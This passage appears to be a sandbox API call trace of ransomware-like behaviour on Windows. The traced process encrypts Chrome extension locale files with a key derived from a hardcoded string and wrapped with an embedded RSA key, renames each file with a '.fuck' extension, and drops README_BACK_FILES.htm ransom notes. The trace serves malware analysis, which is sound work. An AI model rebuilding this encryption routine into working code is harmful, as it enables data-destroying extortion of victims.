Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json.fuck")) returned 1 [0259.897] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.897] CryptDestroyKey (hKey=0x2e7c440) returned 1 [0259.897] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.897] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.897] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.898] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\readme_back_files.htm")) returned 0xffffffff [0259.898] AreFileApisANSI () returned 1 [0259.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.898] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.899] GetFileType (hFile=0x5d64) returned 0x1 [0259.899] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.900] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.900] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.900] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.901] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.901] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.901] GetLastError () returned 0x0 [0259.901] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json")) returned 0x20 [0259.901] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json", dwFileAttributes=0x80) returned 1 [0259.901] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.902] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.903] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.904] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.906] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.906] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0259.906] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb4b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.906] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c7c0) returned 1 [0259.906] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.906] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.906] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6f308) returned 1 [0259.907] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6f308, dwCertEncodingType=0x1, pInfo=0x2e28b80*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e28bb0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e28bb8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7cac0) returned 1 [0259.907] CryptEncrypt (in: hKey=0x2e7cac0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.907] CryptEncrypt (in: hKey=0x2e7cac0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6e318*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6e318*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.907] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e6e318*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6e318*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.908] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x2d0, lpOverlapped=0x0) returned 1 [0259.910] CryptEncrypt (in: hKey=0x2e7c7c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2d0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2e0) returned 1 [0259.910] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x2e0, lpOverlapped=0x0) returned 1 [0259.912] CloseHandle (hObject=0x5d5c) returned 1 [0259.912] CloseHandle (hObject=0x5d60) returned 1 [0259.912] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json"), bFailIfExists=0) returned 1 [0259.915] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json", dwFileAttributes=0x0) returned 1 [0259.915] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json.gsg")) returned 1 [0259.916] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json.fuck")) returned 1 [0259.918] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.918] CryptDestroyKey (hKey=0x2e7c7c0) returned 1 [0259.918] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.918] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.918] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.918] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\readme_back_files.htm")) returned 0xffffffff [0259.918] AreFileApisANSI () returned 1 [0259.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.918] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.919] GetFileType (hFile=0x5d64) returned 0x1 [0259.919] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.920] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.921] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.921] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.921] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.921] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.921] GetLastError () returned 0x0 [0259.921] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\messages.json")) returned 0x20 [0259.921] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json", dwFileAttributes=0x80) returned 1 [0259.922] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.923] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.926] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.927] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.929] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.929] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0259.929] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb328, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.929] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c440) returned 1 [0259.929] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.929] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.929] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6f390) returned 1 [0259.930] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6f390, dwCertEncodingType=0x1, pInfo=0x2e28d20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e28d50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e28d58*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7cb00) returned 1 [0259.930] CryptEncrypt (in: hKey=0x2e7cb00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.930] CryptEncrypt (in: hKey=0x2e7cb00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6e6d0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6e6d0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.930] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e6e6d0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6e6d0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.931] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x253, lpOverlapped=0x0) returned 1 [0259.932] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x253, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x260) returned 1 [0259.933] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x260, lpOverlapped=0x0) returned 1 [0259.941] CloseHandle (hObject=0x5d60) returned 1 [0259.941] CloseHandle (hObject=0x5d5c) returned 1 [0259.941] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\messages.json"), bFailIfExists=0) returned 1 [0259.944] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json", dwFileAttributes=0x0) returned 1 [0259.944] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\messages.json.gsg")) returned 1 [0259.945] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\messages.json.fuck")) returned 1 [0259.946] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.946] CryptDestroyKey (hKey=0x2e7c440) returned 1 [0259.946] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.946] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.946] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.946] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\readme_back_files.htm")) returned 0xffffffff [0259.947] AreFileApisANSI () returned 1 [0259.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 160 [0259.947] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.949] GetFileType (hFile=0x5d64) returned 0x1 [0259.949] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.950] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.950] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.950] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.950] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.950] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.950] GetLastError () returned 0x0 [0259.950] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 